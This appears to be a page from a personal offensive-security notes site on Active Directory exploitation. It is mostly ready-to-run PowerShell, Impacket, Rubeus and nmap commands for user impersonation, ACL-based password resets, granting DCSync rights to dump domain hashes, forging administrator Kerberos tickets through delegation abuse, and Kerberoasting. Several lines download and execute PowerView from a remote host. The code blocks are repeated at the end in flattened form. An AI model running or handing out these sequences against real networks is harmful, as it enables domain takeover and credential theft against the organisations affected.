Domain Enumeration + Exploitation

PowerSploit

Impersonate Another Domain User

$cred = New-Object System.Management.Automation.PSCredential "BURMAT\John.Smith", $(ConvertTo-SecureString "Spring2020!" -AsPlainText -Force);

Find-DomainShare -ComputerName fs01.burmat.local -Credential $cred -ComputerDomain burmat.local -CheckShareAccess

Invoke-UserImpersonation -Credential $cred

# now we can read the directory impersonating another user if permissions exist:
dir \\fs01.burmat.local\Private```
### Enumerate GPO's
```powershell
"{7EA15487-7F5B-4CE3-C029-CEBE6FFE6D47}" | Get-DomainGPO

Reset Domain User Password

If you own the owner of another AD user object (WriteOwner, WriteDACL, GenericWrite, Owner, etc), you can reset the password with ease:

IEX(New-Object Net.WebClient).downloadString('http://10.10.10.123/ps/PowerView.ps1')
$user = 'DOMAIN\owner_acct';
$pass= ConvertTo-SecureString 'Password123!' -AsPlainText -Force;
$creds = New-Object System.Management.Automation.PSCredential $user, $pass;
$newpass = ConvertTo-SecureString 'burmatw@sh3r3' -AsPlainText -Force;
Set-DomainUserPassword -Identity 'DOMAIN\vuln_user' -AccountPassword $newpass -Credential $creds;

Or if you can set yourself as owner, the following will do:

IEX(New-Object Net.WebClient).downloadString('http://10.10.10.123/ps/PowerView.ps1')
Set-DomainObjectOwner -Identity it_admin -OwnerIdentity burmat
Add-DomainObjectAcl -TargetIdentity it_admin -PrincipalIdentity burmat
$newpass = ConvertTo-SecureString -String 'burmat123$' -AsPlainText -Force
Set-DomainUserPassword -Identity it_admin -AccountPassword $newpass

Or you can do it using Impacket's "smbpasswd.py", as shown below.

Add/Exploit DCSync Rights

Do you have WriteDACL to a domain? Give DCSync rights to an unprivileged domain user account:

Add-DomainObjectAcl -TargetIdentity "DC=burmat,DC=local" -PrincipalIdentity jsmith -Rights DCSync

And use these rights to dump the hashes from the domain:

meterpreter > dcsync_ntlm burmat.local\\jsmith

Impacket

Thanks to the impacket toolset, exploiting misconfigurations in AD environments is made easier.

Kerberos

Brute Usernames with Nmap

nmap -v -Pn -p 88 --script krb5-enum-users.nse --script-args "realm='burmat.local', userdb='users.txt'" 10.10.10.123

GenericWrite to Host + User SPN = PWN

If we have GenericWrite privileges over a host and we are a user that has an SPN, we can write our SID to the msDS-AllowedToActOnBehalfOfOtherIdentity property against the AD object and forge tickets as anyone we like. You can read more about it here: https://alsid.com/company/news/kerberos-resource-based-constrained-delegation-new-control-path

## we can write our delegation attribute to the DC with the following:
$UserSid = Get-DomainUser svc_burmat -Properties objectsid | Select -Expand objectsid;
$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($UserSid))";
$SDBytes = New-Object byte[] ($SD.BinaryLength);
$SD.GetBinaryForm($SDBytes, 0);
Get-DomainComputer websrv.burmat.local | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes};

## use rubeus to forge tickets as administrator accounts
rubeus.exe s4u /user:svc_burmat /ticket:doIFFDCCBRCg..SNIP.. /impersonateuser:administrator /msdsspn:cifs/websvr.burmat.local /ptt;

Setting an SPN

With setspn.exe:

setspn -s MSSQLSvc/USER-PC01.burmat.local burmat.local\svc-mssql 
setspn -L burmat.local\svc-mssql

# remove with:
setspn -d MSSQLSvc/USER-PC01.burmat.local burmat.local\svc-mssql

ActiveDirectory module:

Set-ADUser -Identity svc-mssql -ServicePrincipalNames @{Add='MSSQLSvc/USER-PC01.burmat.local','host/USER-PC01.burmat.local'};

# clear them out with
Set-ADUser -Identity svc-mssql -ServicePrincipalNames $Null;

Listing SPNs

Using ldifde

ldifde -d "DC=burmat,DC=local" -l ServicePrincipalName -F C:\SPNs.txt

Using the PowerShell Module ActiveDirectory

Get-ADComputer -Filter * -Properties ServicePrincipalNames | Select-Object -ExpandProperty ServicePrincipalNames;

Get-ADUser -Filter * -Properties ServicePrincipalNames | Select-Object -ExpandProperty ServicePrincipalNames;

With DirectorySearcher

$s = New-Object DirectoryServices.DirectorySearcher([ADSI]"");
$s.PageSize = 2000; 
$s.Filter = "(servicePrincipalName=*)";
$s.FindAll();

Using ldapsearch

https://burmat.gitbook.io/security/hacking/domain-exploitation#ldap-enumeration

Creating a Keytab

ktpass /princ wsman/svc-mssql@burmat.local /mapuser svc-mssql@burmat.local /pass "S3cur3PW123" /out svc-mssql.keytab /crypto all /ptype KRB5_NT_PRINCIPAL /mapop set

Kerberoasting:

Rubeus

rubeus.exe kerberoast /creduser:burmat.local\xsvc /credpassword:S3cur3PW123 /outfile:user.hash

PowerView

Get-DomainUser * -SPN | Get-DomainSPNTicket -OutputFormat Hashcat | Export-Csv .\ticket.csv -NoTypeInformation

Miscellaneous

# list shared folders
Get-WmiObject -Class Win32_Share -Computer dc1.burmat.local

## get .NET versions installed:
dir C:\Windows\Microsoft.NET\Framework

Previoussecurity and systems administration NextCommand and Control

Last updated 4 months ago

$cred = New-Object System.Management.Automation.PSCredential "BURMAT\John.Smith", $(ConvertTo-SecureString "Spring2020!" -AsPlainText -Force); Find-DomainShare -ComputerName fs01.burmat.local -Credential $cred -ComputerDomain burmat.local -CheckShareAccess Invoke-UserImpersonation -Credential $cred # now we can read the directory impersonating another user if permissions exist: dir \\fs01.burmat.local\Private``` ### Enumerate GPO's ```powershell "{7EA15487-7F5B-4CE3-C029-CEBE6FFE6D47}" | Get-DomainGPO

IEX(New-Object Net.WebClient).downloadString('http://10.10.10.123/ps/PowerView.ps1') $user = 'DOMAIN\owner_acct'; $pass= ConvertTo-SecureString 'Password123!' -AsPlainText -Force; $creds = New-Object System.Management.Automation.PSCredential $user, $pass; $newpass = ConvertTo-SecureString 'burmatw@sh3r3' -AsPlainText -Force; Set-DomainUserPassword -Identity 'DOMAIN\vuln_user' -AccountPassword $newpass -Credential $creds;

IEX(New-Object Net.WebClient).downloadString('http://10.10.10.123/ps/PowerView.ps1') Set-DomainObjectOwner -Identity it_admin -OwnerIdentity burmat Add-DomainObjectAcl -TargetIdentity it_admin -PrincipalIdentity burmat $newpass = ConvertTo-SecureString -String 'burmat123$' -AsPlainText -Force Set-DomainUserPassword -Identity it_admin -AccountPassword $newpass

## we can write our delegation attribute to the DC with the following: $UserSid = Get-DomainUser svc_burmat -Properties objectsid | Select -Expand objectsid; $SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($UserSid))"; $SDBytes = New-Object byte[] ($SD.BinaryLength); $SD.GetBinaryForm($SDBytes, 0); Get-DomainComputer websrv.burmat.local | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes}; ## use rubeus to forge tickets as administrator accounts rubeus.exe s4u /user:svc_burmat /ticket:doIFFDCCBRCg..SNIP.. /impersonateuser:administrator /msdsspn:cifs/websvr.burmat.local /ptt;

Set-ADUser -Identity svc-mssql -ServicePrincipalNames @{Add='MSSQLSvc/USER-PC01.burmat.local','host/USER-PC01.burmat.local'}; # clear them out with Set-ADUser -Identity svc-mssql -ServicePrincipalNames $Null;

Get-ADComputer -Filter * -Properties ServicePrincipalNames | Select-Object -ExpandProperty ServicePrincipalNames; Get-ADUser -Filter * -Properties ServicePrincipalNames | Select-Object -ExpandProperty ServicePrincipalNames;